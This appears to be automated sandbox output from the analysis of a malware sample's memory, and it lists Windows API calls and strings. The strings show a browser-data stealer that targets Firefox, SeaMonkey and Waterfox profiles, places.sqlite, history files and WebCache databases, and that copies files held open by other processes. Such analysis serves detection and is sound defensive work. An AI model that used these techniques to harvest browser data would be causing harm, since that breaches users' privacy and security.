                                                          • memset.MSVCRT ref: 00403CE9
                                                          • memset.MSVCRT ref: 00403CFE
                                                          • memset.MSVCRT ref: 00403D13
                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                          • memset.MSVCRT ref: 00403DDA
                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                          Similarity
                                                          • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                          • String ID: Waterfox$Waterfox\Profiles
                                                          • API String ID: 1829478387-11920434
                                                          APIs
                                                          • memset.MSVCRT ref: 00403E50
                                                          • memset.MSVCRT ref: 00403E65
                                                          • memset.MSVCRT ref: 00403E7A
                                                          • memset.MSVCRT ref: 00403E8F
                                                          • memset.MSVCRT ref: 00403EA4
                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                          • memset.MSVCRT ref: 00403F6B
                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                          Similarity
                                                          • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                          • API String ID: 1829478387-2068335096
                                                          APIs
                                                          • memset.MSVCRT ref: 00403FE1
                                                          • memset.MSVCRT ref: 00403FF6
                                                          • memset.MSVCRT ref: 0040400B
                                                          • memset.MSVCRT ref: 00404020
                                                          • memset.MSVCRT ref: 00404035
                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                          • memset.MSVCRT ref: 004040FC
                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                          Similarity
                                                          • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                          • API String ID: 1829478387-3369679110
                                                          APIs
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                          • API String ID: 3510742995-2641926074
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                          Similarity
                                                          • API ID: ??3@CreateErrorFileLast
                                                          • String ID: |A
                                                          • API String ID: 4200628931-1717621600
                                                          APIs
                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                          • memset.MSVCRT ref: 004033B7
                                                          • memcpy.MSVCRT ref: 004033D0
                                                          • wcscmp.MSVCRT ref: 004033FC
                                                          • _wcsicmp.MSVCRT ref: 00403439
                                                          Similarity
                                                          • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                          • String ID: $0.@
                                                          • API String ID: 3030842498-1896041820
                                                          APIs
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 2941347001-0
                                                          APIs
                                                          • memset.MSVCRT ref: 00403C09
                                                          • memset.MSVCRT ref: 00403C1E
                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                          • wcscat.MSVCRT ref: 00403C47
                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                          • wcscat.MSVCRT ref: 00403C70
                                                          Similarity
                                                          • API ID: memsetwcscat$wcscpywcslen
                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                          • API String ID: 2489821370-1174173950
                                                          APIs
                                                          • memset.MSVCRT ref: 0040A824
                                                          • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                          • wcscpy.MSVCRT ref: 0040A854
                                                          • wcscat.MSVCRT ref: 0040A86A
                                                          • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                          Similarity
                                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 669240632-0
                                                          APIs
                                                          • wcschr.MSVCRT ref: 00414458
                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                          • String ID: "%s"
                                                          • API String ID: 1343145685-3297466227
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                          • String ID: GetProcessTimes$kernel32.dll
                                                          • API String ID: 1714573020-3385500049
                                                          APIs
                                                          • memset.MSVCRT ref: 004087D6
                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                          • memset.MSVCRT ref: 00408828
                                                          • memset.MSVCRT ref: 00408840
                                                          • memset.MSVCRT ref: 00408858
                                                          • memset.MSVCRT ref: 00408870
                                                          • memset.MSVCRT ref: 00408888
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 2911713577-0
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcmp
                                                          • String ID: @ $SQLite format 3
                                                          • API String ID: 1475443563-3708268960
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmpqsort
                                                          • String ID: /nosort$/sort
                                                          • API String ID: 1579243037-1578091866
                                                          APIs
                                                          • memset.MSVCRT ref: 0040E60F
                                                          • memset.MSVCRT ref: 0040E629
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          Strings
                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                          • API String ID: 3354267031-2114579845
                                                          APIs
                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindLoadLockSizeof
                                                          • String ID:
                                                          • API String ID: 3473537107-0
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          Strings
                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                          • API String ID: 2221118986-1725073988
                                                          APIs
                                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                                          • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotificationSleep
                                                          • String ID: }A
                                                          • API String ID: 1821831730-2138825249
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@DeleteObject
                                                          • String ID: r!A
                                                          • API String ID: 1103273653-628097481
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@
                                                          • String ID:
                                                          • API String ID: 1033339047-0
                                                          APIs
                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                          • memcmp.MSVCRT ref: 00444BA5
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$memcmp
                                                          • String ID: $$8
                                                          • API String ID: 2808797137-435121686
                                                          Strings
                                                          • too many columns on %s, xrefs: 00430763
                                                          • duplicate column name: %s, xrefs: 004307FE
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: duplicate column name: %s$too many columns on %s
                                                          • API String ID: 0-1445880494
                                                          APIs
                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                            • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                          • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                          • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                            • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                          • String ID:
                                                          • API String ID: 1042154641-0
                                                          APIs
                                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                          • memset.MSVCRT ref: 00414C87
                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProcVersionmemsetwcscpy
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                          • API String ID: 4182280571-2036018995
                                                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                          APIs
                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                          • memset.MSVCRT ref: 00403A55
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                          • String ID: history.dat$places.sqlite
                                                          • API String ID: 3093078384-467022611
                                                          • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                          • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                          APIs
                                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                          • GetLastError.KERNEL32 ref: 00417627
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$File$PointerRead
                                                          • String ID:
                                                          • API String ID: 839530781-0
                                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID: *.*$index.dat
                                                          • API String ID: 1974802433-2863569691
                                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@mallocmemcpy
                                                          • String ID:
                                                          • API String ID: 3831604043-0
                                                          • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                          • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$FilePointer
                                                          • String ID:
                                                          • API String ID: 1156039329-0
                                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$ChangeCloseCreateFindNotificationTime
                                                          • String ID:
                                                          • API String ID: 1631957507-0
                                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
